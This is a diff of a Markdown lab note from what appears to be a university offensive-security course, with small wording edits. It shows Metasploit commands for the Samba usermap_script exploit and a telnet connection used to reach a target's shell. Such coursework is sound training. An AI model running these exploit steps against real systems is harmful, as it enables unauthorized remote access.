eisenbeisr/CSC466-OffensiveSecurityResearch/Phase1.md

 telnet <target ip> 23
 ```

-- We can also access the shell of the target system via the `samba` service by using the following commands
+- We can also access the shell of the target system via the `samba port 445` by using the following commands

 **Loads the exploit to target a samba vulnerability**
 ```
 use exploit/multi/samba/usermap_script
 ```
-**Sets remote host IP address of target system**
+**Sets remote host IPv4 address of target system**
 ```
 set RHOST <target ip>
 ```